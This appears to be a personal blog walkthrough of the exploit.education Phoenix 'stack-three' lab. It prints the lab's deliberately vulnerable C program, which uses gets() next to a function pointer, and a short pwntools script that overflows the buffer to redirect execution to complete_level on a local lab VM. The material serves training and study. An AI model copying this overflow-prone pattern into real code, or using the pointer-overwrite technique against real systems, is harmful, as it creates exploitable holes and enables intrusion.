π–ˆπ–žπ–‡π–Šπ–—π–Œπ–šπ–—π–šπŸ’€~$

Hamza's Blog

View on GitHub

Stack-Three

Source Code


/*
 * phoenix/stack-three, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable to 0x0d0a090a
 *
 * When does a joke become a dad joke?
 *   When it becomes apparent.
 *   When it's fully groan up.
 *
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

void complete_level() {
  printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
  exit(0);
}

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int (*fp)();
  } locals;

  printf("%s\n", BANNER);

  locals.fp = NULL;
  gets(locals.buffer);

  if (locals.fp) {
    printf("calling function pointer @ %p\n", locals.fp);
    fflush(stdout);
    locals.fp();
  } else {
    printf("function pointer remains unmodified :~( better luck next time!\n");
  }

  exit(0);
}

Let’s Dig in the code

If the fp function pointer is still NULL, a message is printed indicating that the function pointer remains unmodified.

The goal of the challenge is to change the value of the fp pointer to the address of the complete_level function, using GDB we could extract the address of the function

the function address is 0x40069d

this challenge is similar to the previous stack challenge, hence we use a similar script but with a slice change of parameters

Solution Script


#!/usr/bin/python
## script by Hamza Saidu
## enjoy!!!

from pwn import *


s = ssh(host='localhost', user='user', password='user', port=2222)

p = s.process('/opt/phoenix/amd64/stack-three')

print(p.recvline())
p.sendline("A"*64 +"\x9d\x06\x40")
print(p.recvline())
print(p.recv(1024))

running the script we got:

And viola!! Our complete_level function is called.